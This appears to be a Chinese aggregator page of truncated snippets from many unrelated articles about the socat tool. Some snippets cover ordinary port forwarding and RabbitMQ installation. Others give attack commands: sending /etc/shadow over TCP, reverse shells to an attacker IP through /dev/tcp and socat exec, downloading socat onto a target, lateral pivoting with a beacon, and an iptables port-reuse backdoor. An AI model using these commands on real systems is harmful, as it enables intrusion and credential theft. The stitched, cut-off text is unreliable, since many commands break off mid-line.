目录 0x01 socat介绍 0x02 socat进行文件传输 0x03 socat正向端口转发 0x04 socat反向端口转发 注: 边界机器 Ubuntu 192.168.222.177 内网机器...win7 192.168.222.137 0x01 socat介绍 socat我们在前面也已经介绍过了,之前说的是Windows下的利用,如果没有看到的朋友请移步【socat在Windows下的使用】...,socat本身就是在Linux下使用的,非要将它放到Windows下使用难免会有水土不服嘛,这次就回到Linux上来进行socat的使用。...apt-get install socat 完成后来检验一下是否安装成功 socat -h 0x02 socat进行文件传输 首先,我们去边界机器执行 socat -u /etc/shadow TCP4...socat.exe tcp-listen:1000 tcp-listen:1001 然后,我们在边缘机器上执行命令 注:10.1.135.96是我本地主机的IP socat tcp4-connect
用socat试几个netcat常用的用法,对比如下: 1....听tcp 12345端口 # nc -l 127.0.0.1 12345 # socat tcp-listen:12345 – 2....向远处tcp 12345端口发点字 # echo “test” | nc 127.0.0.1 12345 # echo “test” | socat – tcp-connect:127.0.0.1:...听udp 23456端口 # nc -u -l 127.0.0.1 23456 # socat udp-listen:23456 – 4....向远处udp 23456端口发点字 # echo “test” | nc -u 127.0.0.1 23456 # echo “test” | socat – udp-connect:127.0.0.1
以前写过一篇使用iptables进行端口转发的文章, 今天写一下使用socat将本地端口的流量转发到远程机上的过程. 不要问我这样做有什么用, 我也不知道....安装 $ sudo apt install socat 转发TCP端口 $ sudo vim /etc/systemd/system/socat.service # 写入如下内容 [Unit] Description...=socat (https://www.zhukun.net) After=network-online.target Wants=network-online.target [Service] User...$ sudo systemctl start socat_udp.service $ sudo systemctl enable socat.service $ sudo systemctl enable...socat_udp.service
socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的 通道。...用socat就不用這麼麻煩了: on host 1: c:\>socat -u open:myfile.exe,binary tcp-listen:999 on host 2: c:\>socat...只要能夠在內部運行socat就可以了。...外部: c:\>socat tcp-listen:1234 tcp-listen:3389 內部: c:\>socat tcp:outerhost:1234 tcp:192.168.12.34:3389...socat還具有一個獨特的讀寫分流功能,比如: c:\>socat open:read.txt!!
所以只能寻求另一种办法,就是用socat工具来完成端口转发,如果你只有少数几个端口要转发的话,那么socat就是比较好的选择了。...socat唯一麻烦的地方就是好像我没找到如何转发端口段,只能一个命令一个端口。不过如果只是自用转发少量端口的话还是蛮好用的。...socat安装 使用命令: #CentOS系统 yum install -y socat #Ubuntu或Debian系统 apt-get update apt-get install -y socat...socat的使用 1、转发TCP nohup socat TCP4-LISTEN:10000,reuseaddr,fork TCP4:1.1.1.1:10000 >> socat.log 2>&1 &...2、转发UDP nohup socat -T 600 UDP4-LISTEN:10000,reuseaddr,fork UDP4:1.1.1.1:10000 >> socat.log 2>&1 & 很方便吧
socat 2016/05/11 Chenxin整理 socat简介 黑客小工具—socat socat 被称为是NC的plus,plus版,号称NC的最强的衍生版本。...Socat支持广播和多播、抽象Unix sockets、Linux tun/tap、GNU readline 和 PTY。它提供了分叉、记录和进程间通信的不同模式。...下载socat源代码包 Index of /socat/download socat的基本用法 监听端口: socat tcp-l:12345 – 发送数据到端口: echo xxx | socat...7.3.7 转发 7.3.7.1 本地端口转向远程主机 socat TCP4-LISTEN:8888 TCP4:www.qq.com:80 如果需要使用并发连接,则加一个fork,如下 socat...FILENAME.crtcat $FILENAME.key $FILENAME.crt >$FILENAME.pem 在当前目录下生成 server.pem server.crt 7.3.10.2 使用
Socat 语法比 Netcat 难Socat 普及性不如 Netcat。默认情况下,几乎每个 Linux 发行版都安装了 Netcat。但它们默认情况下很少安装 Socat。...在处理 Linux 目标时,可以使用上述讲到的技术来加固 shell:1. 使用 Ctrl + Z 挂起 shell使用如下命令加固 shell 并重新进入。...如果 Linux 系统,可以使用 curl 或 wget (wget /socat -O /tmp/socat) 来下载文件。...Linux 目标的等效命令如下:socat TCP:: EXEC:"bash -li"Bind Shells在 Linux 目标上,我们将使用以下命令:socat...socat TCP:: -现在让我们来看看 Socat 的一个更强大的用途:一个完全稳定的 Linux tty 反向 shell。
1. python pty 方式 一般我们都会使用nc来接收反弹来的shell,只需要在目标上(以linux为例)执行: bash -i >& /dev/tcp/192.168.2.134/4444 0...使用socat socat是类Unix系统下的一个工具,可以看作是 nc 的加强版。我们可以使用socat来传递完整的带有tty的TCP连接。...64/socat 使用起来也很简单。.../binaries/linux/x86_64/socat -O /tmp/socat # 运行 $ chmod +x /tmp/socat $ /tmp/socat exec:'...4. script获取pty 我们可以使用 Linux 系统下的 script 命令,在弹回来的 shell 下创建一个带有 tty 的 shell, 这样就可以勉强使用一下 top 和 vim :
Linux安装rinetd实现TCP/UDP端口转发 Docker + Brook + Portainer搭建一套自己的端口转发程序,带WEB管理 使用Nginx进行TCP/UDP端口转发 网上关于端口转发软件的评测非常少...,最高CPU使用率32%,耗时67s,平均耗时1.5347s,错误次数238次 Summary: Total: 67.5975 secs Slowest: 19.9194...context deadline exceeded (Client.Timeout exceeded while awaiting headers) brook压测结果:最高内存占用25Mb,最高CPU使用率...axel多线程下载测试(第三轮) 测试命令 time axel -n 32 "http://137.175.30.xxx:32771/test" 测试文件为200M,使用axel开启32线程进行下载。...如果是个人少量使用,并且机器配置较低的情况下建议socat 如果并发较大,要求更高的效率,建议选择brook 后续将对其它端口转发软件做对比测试,敬请关注。
STDOUT $ socat echo STDIO!!STDIO $ socat echo -!!- $ socat echo FD:0!!FD:1 $ socat echo 0!!...:2000,bind=:2000 // Linux bug?...# socat - IP:loopback:222 // raw protocol, self "connected" (attention, // Linux might drop packets with...======================== // GENERIC FUNCTION CALLS // ioctl(): open CD drive (given value valid on Linux...) // on my Linux system I find in /usr/include/linux/cdrom.h the define: // #define CDROMEJECT
反弹shell Socat是Linux 下一个多功能的网络工具,名字来由是”Socket CAT”,因此可以看出它是基于socket的,其功能与netcat类似,不过据说可以看做netcat的加强版,事实上的确也是如此...我这里只简单的介绍下怎么使用它开启监听和反弹shell,其他详细内容可以参见这里:http://brieflyx.me/2015/linux-tools/socat-introduction/ 安装Socat...的方法很简单: Ubuntu等可以直接使用 apt-get install socat 命令进行安装 也可以去官网下载源码包:http://www.dest-unreach.org/socat 攻击机本地监听命令...: socat TCP-LISTEN:2333 - 或 nc -lvvp 2333 目标机主动连接攻击机命令: socat tcp-connect:47.xxx.xxx.72:2333 exec:'bash...OpenSSL反弹加密shell 实验环境:Linux 目标机: 系统:Linux IP:192.168.1.8 攻击机: 系统:Linux IP:47.xxx.xxx.72 假设我们从目标机反弹 shell
在红色区域的 PIVOT 主机上开启通过 SSH Socks 的 445 端口转发 socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1::445 socat...socat 建立 socks 连接默认端口就是 1080 ,由于我们上面设置的就是 1080,因此这里不需变动。...在攻击者控制的主机上运行 beacon,使其上线 注意需要使用 administrator 权限运行 beacon 4....首先使 Win1 主机上线,接着在 Linux1 主机上通过 SSH 连接到 Linux2 主机。...在 Linux1 主机上开启 445 端口转发 socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:192.168.232.132:445 3.
10行数据 Linux文件系统结构 / : 根目录 /home: 主文件夹,登录用户的主文件夹 /etc :操作系统配置文件的保存位置 /usr : 用于添加的程序文件,用户的很多应用程序和文件都放在这个目录下...本地文件 :上传本地文件到远程服务器 ,只能是压缩文件,比如.tar.gz push abc.txt : 上传本地当前文件abc.txt到远程服务器 exit : 退出 windows 操作Linux...pyttty 开源软件 Linux打包命令 tar -czvf 包文件.tar.gz 文件夹1 文件夹2...System /正则 :向后查找 n 查找下一个 先使用?...vi编辑器修改 重启tomcat,我们使用zip安装方式安装的,因此需要在Tomcat的bin下执行: .
使用起来也比较简单。如下图所示,这个postgres数据库没有root权限。...Linux提权操作却无gcc 通过postgreSQL提权漏洞,我们可以执行linux系统命令了,接下来需要提权到服务器的root权限。...比较麻烦的是,需要把二进制文件转成16进制格式的,如下图所示: 接下来就是与postgres的提权语句结合起来使用了,原有的echo命令是这样的: echo -e -n "\x23\x23\x23\x23...我想到了一个好久没用的工具socat,解决了这个问题。 socat获取交互型shell socat这款工具,可以说是nc的升级版本,可以轻松获取到一个纯交互环境,github上有很多绿色免安装版本。...socat这款工具可以获取一个纯交互环境,而且在docker精简环境下仍能正常使用。 专注于网络安全技术分享,包括红队、蓝队、日常渗透测试、安全体系建设等 每周一篇,99%原创,敬请关注
(看上面的帮助信息,-z是用于扫描的,-w用于设置超时时间) UDP扫描: 默认是TCP扫描,在上述命令上增加一个-u 参数即可使用UDP扫描: nc -nv -z -w 1 -u 192.168.56.101...【TIPS:这时KALI变为向win7传送数据了,攻防目标转换,在目标机为Linux时可使用】 (6)其他功能 nc还可以发掘很多其他功能,在LINUX之间可以利用tar传输目录、传输视频流、甚至克隆设备等...(3)文件传输 仍以powercat.ps1为例 接收方win7: ncat.exe -l > powercat.ps1 【TIPS】 -l 监听模式如果不跟端口号,则默认使用31337 发送方KALI...反向shell: KALI监听:socat -dd TCP4-LISTEN:8888 - 【TIPS】由socat -h 得知-d是查看verbosity信息的意思,可以使用1到4个d,越多越详细,建议是使用两个...后进入powercat的下载目录执行Import-Module powercat.ps1,这样后面可以直接使用powercat这个命令。
socat和ncat命令 其实通过的linux命令socat和ncat可以去操作socket。...socket ncat -vlk 8080 -c 'ncat -U /tmp/tbsocket1' # 通过curl发起http请求访问 curl http://localhost:8080 也可以使用功能更强大的...socat来实现。...# 映射8080/tcp 到unix socket socat -d -d TCP-LISTEN:8080,fork UNIX:/tmp/tbsocket1
下载所需要的安装包 RabbitMQ依赖erlang,socat,所以需要下载erlang, socat, RabbitMQ三个安装包 1....下载socat,在http://www.rpmfind.net/linux/rpm2html/search.php?...query=socat(x86-64)页面下载centos7版 本的socat的rpm安装包 这里下载了socat-1.7.3.2-2.el7.x86_64.rpm 1....安装rpm包 sudo rpm -ivh erlang-21.1.4-1.el7.centos.x86_64.rpm sudo rpm -ivh socat-1.7.3.2-2.el7.x86_64.rpm...rabbitmq安装使用了sudo权限,然后非root用户即使用sudo启动也会存在权限问题,修改一下三个文件夹的权限即可正常启动 sudo chmod -R 777 /var/log/rabbitmq
本文总结了Linux端口转发的一些常用方法,欢迎补充和指正。...ssh -fgN -R 2222:host1:22 localhost (3)动态转发 ssh -fgN -D 12345 root@host1 2、iptables 端口转发 CentOS 7.0 以下使用的是...端口转发 socat是一个多功能的网络工具,使用socat进行端口转发。...(1)socat安装 yum install -y socat (2)在本地监听12345端口,并将请求转发至192.168.172.131的22端口。...socat TCP4-LISTEN:12345,reuseaddr,fork TCP4:192.168.172.131:22 07、 portmap 端口转发 Linux 版的lcx,内网端口转发工具。
包下载地址:https://pkgs.org/download/socat 安装 安装之前需要查看自己系统的版本 # uname -a Linux admin.blog.test 3.10.0-1160.21.1....el7.x86_64 #1 SMP Tue Mar 16 18:28:22 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 可以看到我的系统是el7.x86_64版本的...下载rabbitmq-server、erlang、socat都需要和系统版本对应 安装rabbitmq-server前必须安装erlang和socat,因为rabbitmq-server需要依赖这两个...安装socat 安装socat只需要装最新的就ok了 wget http://mirror.centos.org/centos/7/os/x86_64/Packages/socat-1.7.3.2-2....el7.x86_64.rpm rpm -ivh socat-1.7.3.2-2.el7.x86_64.rpm -i 代表install, -v 和 -h 只不过是打印操作日志的一些参数设置 我的系统是
一、Linux端口复用 ---- 1.概述 使用iptables实现端口复用,使用socat进行连接。...2.原理 (1) iptables iptables是linux下的防火墙管理工具。 真正实现防火墙功能的是netfilter,它是linux内核中实现包过滤的核心。 免费。...Socat是linux下的一个多功能的网络工具,名字来由是socket cat。...socat连接 使用socat发送约定口令至目标主机打开端口复用开关 echo threathuntercoming | socat ‐ tcp:192.168.245.135:8000 使用完毕后,发送约定关闭口令至目标主机目标端口关闭端口复用...使用socat断开连接,ssh无法再连接,但是8000端口回复正常: ?
领取专属 10元无门槛券
手把手带您无忧上云